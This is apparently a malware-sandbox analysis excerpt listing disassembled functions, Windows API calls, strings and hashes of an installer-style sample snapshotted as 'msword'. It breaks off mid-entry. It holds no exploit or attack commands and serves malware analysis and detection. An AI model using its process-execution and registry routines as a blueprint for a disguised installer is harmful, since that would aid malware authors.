String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB
`G, xrefs: 0040246E

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00080C00,00000064,1F401F03), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(007EE200), ref: 00402387

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

